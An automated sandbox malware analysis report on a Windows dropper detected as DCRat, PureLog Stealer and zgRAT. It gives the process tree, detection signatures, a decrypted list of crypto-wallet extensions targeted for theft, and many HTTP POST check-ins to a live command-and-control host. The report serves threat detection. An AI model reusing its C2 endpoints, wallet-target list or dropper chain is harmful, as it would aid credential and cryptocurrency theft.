Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8k1e14tjcx.exe

Overview

General Information

Sample name:8k1e14tjcx.exe
renamed because original name is a hash value
Original sample name:517d21cbe45c2a88930aa345c2a5c36b.exe
Analysis ID:1579116
MD5:517d21cbe45c2a88930aa345c2a5c36b
SHA1:f8c2b259ed15eb455fc345f54a9ef9b0aace552c
SHA256:4b9cb0b6b953edda63999ddd41656c7c509cfb02298eaac8929010c29971cec9
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 8k1e14tjcx.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\8k1e14tjcx.exe" MD5: 517D21CBE45C2A88930AA345C2A5C36B)
    • wscript.exe (PID: 7312 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ChainFontruntimeCrt.exe (PID: 7412 cmdline: "C:\ChainagentComponent/ChainFontruntimeCrt.exe" MD5: 64105CB19AC25A6275C7D929937090A0)
          • cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7564 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7580 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • yeeQesPXxpnDuwPWqTnUoVbi.exe (PID: 7664 cmdline: "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe" MD5: 64105CB19AC25A6275C7D929937090A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
8k1e14tjcx.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    8k1e14tjcx.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 4 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.8k1e14tjcx.exe.58c6709.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.8k1e14tjcx.exe.58c6709.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              4.0.ChainFontruntimeCrt.exe.210000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                4.0.ChainFontruntimeCrt.exe.210000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 3 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\8k1e14tjcx.exe", ParentImage: C:\Users\user\Desktop\8k1e14tjcx.exe, ParentProcessId: 7268, ParentProcessName: 8k1e14tjcx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" , ProcessId: 7312, ProcessName: wscript.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-20T21:17:27.910497+010020480951A Network Trojan was detected192.168.2.44973237.44.238.25080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 8k1e14tjcx.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\HqZFZAkM.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\hgJAcPUI.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\sUnrMbPq.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\ZXODDOCy.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\xWHHAgmB.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\PjjNTCHQ.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeReversingLabs: Detection: 83%
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\user\Desktop\GFbXjJsj.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\HZSnKfqJ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\PjjNTCHQ.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\QZsVJdpt.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ZXODDOCy.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\hgJAcPUI.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\otzSQnXU.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\phDaBATS.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\sUnrMbPq.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\xHFppYee.logReversingLabs: Detection: 37%
                                    Source: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exeReversingLabs: Detection: 83%
                                    Multi AV Scanner detection for submitted file
                                    Source: 8k1e14tjcx.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\HqZFZAkM.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\GFbXjJsj.logJoe Sandbox ML: detected
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\sUnrMbPq.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ZXODDOCy.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\QZsVJdpt.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\xWHHAgmB.logJoe Sandbox ML: detected
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exeJoe Sandbox ML: detected
                                    Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJoe Sandbox ML: detected
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 8k1e14tjcx.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                                    Source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-7QSmDzANvDkQAgXpPhWh","0","","","0","0","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBXbTFHYzJNeVZXbE1RMGw2U1dwdmFXUklTakZhVTBselNXcFJhVTlwU2pCamJsWnNTV2wzYVU1VFNUWkpibEo1WkZkVmFVeERTVEpKYW05cFpFaEtNVnBUU1hOSmFtTnBUMmxLYlZsWGVIcGFVMGx6U1dwbmFVOXBTakJqYmxac1NXbDNhVTlUU1RaSmJsSjVaRmRWYVV4RFNYaE5RMGsyU1c1U2VXUlhWV2xNUTBsNFRWTkpOa2x1VW5sa1YxVnBURU5KZUUxcFNUWkpibEo1WkZkVmFVeERTWGhOZVVrMlNXNVNlV1JYVldsTVEwbDRUa05KTmtsdVVubGtWMVZwWmxFOVBTSmQiXQ=="]
                                    Source: 8k1e14tjcx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\db08104604e511Jump to behavior
                                    Source: 8k1e14tjcx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8k1e14tjcx.exe
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E9A69B
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00EAC220
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 37.44.238.250:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 1512Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2004Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2640Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
